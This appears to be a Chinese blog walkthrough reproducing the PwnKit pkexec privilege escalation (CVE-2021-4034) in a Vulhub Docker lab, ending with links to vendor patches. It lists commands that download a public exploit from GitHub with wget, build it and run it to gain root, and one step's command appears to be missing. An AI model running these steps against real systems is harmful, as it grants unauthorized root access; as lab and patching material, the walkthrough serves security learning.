赞
踩
Polkit(之前名为PolicyKit)是一个权限相关的套件,pkexec是其中用于以其他用户身份执行命令的工具,它具有suid权限。
当前版本的pkexec中没有正确处理参数和环境变量,导致攻击者可以利用这个Bug劫持环境变量`GCONV_PATH`,进而劫持动态链接库,以root身份执行任意代码。
因为这个漏洞不是存在于一个服务中,所以Vulhub只是提供了一个包含Polkit(PolicyKit)v0.105版本套件的Ubuntu。
你可以执行下面的命令,进入这个Ubuntu的交互式shell环境中:
docker-compose run --rm cmd bash
此时,执行id命令可以看见,你是普通用户'nobody':
1.使用[这个项目](https://github.com/berdav/CVE-2021-4034)来利用CVE-2021-4034:
进入tmp目录进行下载
cd /tmp
wget https://github.com/berdav/CVE-2021-4034/archive/refs/heads/main.tar.gz
2.解压下载下来的包
tar -zxvf main.tar.gz
cd CVE-2021-4034-main/
3.make执行(里面对文件进行了编译)
./cve-2021-4034 //执行后,提权成功
目前各Linux发行版官方均已给出安全补丁,建议用户尽快升级至安全版本,或参照官方说明措施进行缓解
Ubuntu:CVE-2021-4034 | Ubuntu
Redhat:Red Hat Customer Portal - Access to 24x7 support and knowledge
Debian:CVE-2021-4034
Copyright © 2003-2013 www.wpsshop.cn 版权所有,并保留所有权利。